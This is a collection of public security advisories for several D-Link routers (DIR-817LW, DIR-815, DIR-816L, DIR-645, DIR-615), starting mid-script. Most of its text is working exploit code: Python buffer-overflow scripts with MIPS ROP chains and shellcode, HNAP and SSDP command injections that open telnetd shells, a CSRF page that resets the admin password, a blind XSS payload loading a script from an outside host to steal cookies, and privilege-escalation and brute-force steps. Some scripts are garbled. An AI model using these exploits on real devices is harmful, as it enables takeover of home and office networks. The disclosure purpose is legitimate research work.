buf+="\x2A\xB1\x4D\xF0" #JUNK S5
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0" #JUNK S7
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="Y"*120
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
'''
548 characters after SOapaction:http://purenetworks.com/HNAP1/GetDeviceSettings/ should work, although sprintf copies twice so only 242 characters are required including /var/run and /etc/templates/hnap which is concatenated with your string to create 548 characters
'''
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5 JUNK
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="AAAA" #s7 JUNK
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose for v2.02
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-817LW Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-817LW -- Wireless AC750 Dual Band Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #s0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # points to rop3
#buf+="1"*17 # exit payload
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian
buf+="Y"*120 # ROP gadget 2 that loads into $t9
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# Working
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="AAAA"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # points to rop3
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian shell
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose and internal
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';echo "<?phpinfo?>" > passwd1.php;telnetd -p 9090;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
----------------------------------------------------------------------------------------------
Title:
====
D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF) vulnerability
Credit:
======
Name: Bhadresh Patel
Company/affiliation: HelpAG
Website: www.helpag.com
CVE:
=====
CVE-2015-5999
Date:
====
10-11-2015 (dd/mm/yyyy)
Vendor:
======
D-Link is a computer networking company with relatively modest beginnings in Taiwan. The company has grown over the last 25 years into an exciting global brand offering the most up-to-date network solutions. Whether it is to suit the needs of the home consumer, a business or service provider, D-link take pride in offering award-winning networking products and services.
Product:
=======
DIR-816L is a wireless AC750 Dual Band Cloud Router
Product link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Report-Timeline:
============
27-07-2015: Vendor notification
27-07-2015: Vendor Response/Feedback
05-11-2015: Vendor Fix/Patch
10-11-2015: Public or Non-Public Disclosure
Affected Version:
=============
<=2.06.B01
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
Details:
=======
An attacker who lures a DIR-816L authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to DIR-816L wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the admin account password, changing the network policy, etc.
Proof Of Concept:
================
1) User login to DIR-816L wireless router
2) User visits the attacker's malicious web page (attacker.html)
3) attacker.html exploits CSRF vulnerability and changes the admin account password
PoC video link: http://youtu.be/UBdR2sUc8Wg
Exploit code (attacker.html):
<html>
<body>
<iframe style="display:none" name="hiddenpost"></iframe>
<form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf">
<input type="hidden" name="<?xml version" value=""1.0" encoding="UTF-8"?> <postxml> <module> 	<service>DEVICE.ACCOUNT</service> 	<device> 		<gw_name>DIR-816L</gw_name> 		 		<account> 			<seqno>1</seqno> 			<max>2</max> 			<count>1</count> 			<entry> 				<uid>USR-</uid> 				<name>Admin</name> 				<usrid/> 				<password>password</password> 				<group>0</group> 				<description/> 			</entry> 		</account> 		<group> 			<seqno/> 			<max/> 			<count>0</count> 		</group> 		<session> 			<captcha>1</captcha> 			<dummy/> 			<timeout>180</timeout> 			<maxsession>128</maxsession> 			<maxauthorized>16</maxauthorized> 		</session> 	</device> </module> <module> 	<service>HTTP.WAN-1</service> 	<inf> 		<web></web> 		<https_rport></https_rport> 		<stunnel>1</stunnel> 		<weballow> 			<hostv4ip/> 		</weballow> 		<inbfilter/> 	</inf> 	 </module> <module> 	<service>HTTP.WAN-2</service> 	<inf> 		<active>0</active> 		<nat>NAT-1</nat> 		<web/> 		<weballow> 			<hostv4ip/> 		</weballow> 	</inf> 	 </module> <module> 	<service>INBFILTER</service> 	<acl> 		<inbfilter>		 						<seqno>1</seqno> 			<max>24</max> 			<count>0</count> 		</inbfilter>		 	</acl> 	<ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module> <module> 	<service>SHAREPORT</service> 	<FATLADY>ignore</FATLADY> 	 <ACTIVATE>ignore</ACTIVATE></module> <module> 	<service>SAMBA</service> 	<samba>		 		     		<enable>1</enable> 		<auth>1</auth>     </samba> </module> </postxml>" />
</form>
<script>alert("This is CSRF PoC");document.getElementById("csrf").submit()</script>
<iframe style="display:none" name="hiddencommit"></iframe>
<form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1">
<input type="hidden" name="ACTIONS" value="SETCFG,SAVE,ACTIVATE" />
</form>
<script>document.getElementById("csrf1").submit()</script>
</body>
</html>
Patched/Fixed Firmware and notes:
==========================
2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP
2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF
Credits:
=======
Bhadresh Patel
Senior Security Analyst
HelpAG (www.helpag.com)
----------------------------------------------------------------------------------------------
## Advisory Information
Title: SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
Many Dlink routers affected. Tested on DIR-815.
## Vulnerabilities Summary
DIR-815,850L and most of Dlink routers are susceptible to this flaw. This allows to perform command injection using SSDP packets and on UDP. So no authentication required. Just the fact that the attacker needs to be on wireless LAN or be able to fake a request coming from internal wireless LAN using some other mechanism.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# This vulnerability is pretty much in every router that has cgibin and uses SSDP code in that cgibin. This one worked on the device dir-815. Will work only in WLAN
buf = 'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 9094;ls\r\nMX:2\r\nMAN:"ssdp:discover"\r\n\r\n'
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("239.255.255.250", 1900))
s.send(buf)
s.close()
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import urllib
import urllib2
# This exploits the auth_main.cgi with read buffer overflow exploit for v2.02
# prequisite is just to have id and password fields in params
url = 'http://192.168.0.1/authentication.cgi'
junk = "A"*1004+"B"*37+"\x58\xf8\x40\x00" # address of system function in executable
junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA"
values = "id=test&password=test&test="+junk
req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
the_page = response.read()
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"*286
buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0)
buf+= "B"*20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload
buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection in
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.1", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: Dlink DIR-645 UPNP Buffer Overflow
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-645 -- Whole Home Router 1000 from Dlink. Mainly used by home and small offices.
## Vulnerabilities Summary
I have come across 2 security issues in DIR-645 firmware which allows an attacker on wireless LAN and possibly WAN network to execute command injection and buffer overflow attack against the wireless router. I have provided exploit scripts written in python that give details of the exploits. The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
# Buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158
exploit_buffer+="C"*50+"Z"*46
exploit_buffer+="\xb4\x67\xb3\x2a"
exploit_buffer+="\xd0\xeb\xb4\x2a"
exploit_buffer+="VVVV"
a
exploit_buffer+="\x7c\xba\xb1\x2a"
exploit_buffer+="K"*16
exploit_buffer+="\x44\x3b\xb0\x2A"
exploit_buffer+="A"*36
exploit_buffer+="\xf0\x5e\xb0\x2A"
exploit_buffer+="H"*16
exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"
print "[+] sending exploit_bufferfer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 80))
s.send(exploit_buffer)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
######################################################################################
# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting (XSS)
# Date: 14.04.2018
# Exploit Author: Sayan Chatterjee
# Vendor Homepage: http://www.dlink.co.in
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Category: Hardware (Wi-fi Router)
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10
# CVE: CVE-2018-10110
#######################################################################################
Reproduction Steps:
------------------------------
1. Go to your wi-fi router gateway [i.e: http://192.168.0.1]
2. Go to –> “Maintenance” –> “Admin”
3. Create a user with name alert_"HI"
4. Refresh the page and you will be having “HI” popup
#######################################################################################
# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting
# Date: 2019-12-13
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19742
Reproduction Steps:
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
2. Go to Maintenance page and click on Admin on the left panel
3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.
#Burp Intercept
POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1
username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
<http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass
# Date: 2019-10-12
# Exploit Author: huzaifa hussain
# Vendor Homepage: https://in.dlink.com/
# Version: DIR-615 T1 ver:20.10
# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
# CVE: CVE-2019-17525
D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING.
------------------------------------
D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new.
ATTACK SCENARIO AND REPRODUCTION STEPS
1: Find the ROUTER LoginPage.
2: Fill the required login credentials.
3: Fill the CAPTCH properly and Intercept the request in Burpsuit.
4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab
5: Set the payloads on target variables i.e. username & password under Payloads Tab.
5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab.
6: Now hit the start attack and you will find the correct credentials.
-------------------------------------
Huzaifa Hussain
# Exploit Title: D-Link DIR-615 - Privilege Escalation
# Date: 2019-12-10
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19743
# Reproduction Steps:
# Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
# Go to the Maintenance page and click on Admin on the left panel.
# There is an option to create a user and by default, it shows only user accounts.
# Create an account with a name(i.e ptguy) and change the privileges from user to root(admin)
# by changing privileges id (1 to 2) with burp suite.
# Privilege Escalation Post Request
POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1
username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
# Now log in with newly created root (ptguy) user. You have all administrator rights.